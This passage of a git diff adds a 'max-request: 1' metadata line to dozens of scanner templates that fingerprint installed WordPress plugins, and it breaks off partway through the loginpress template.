--- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- 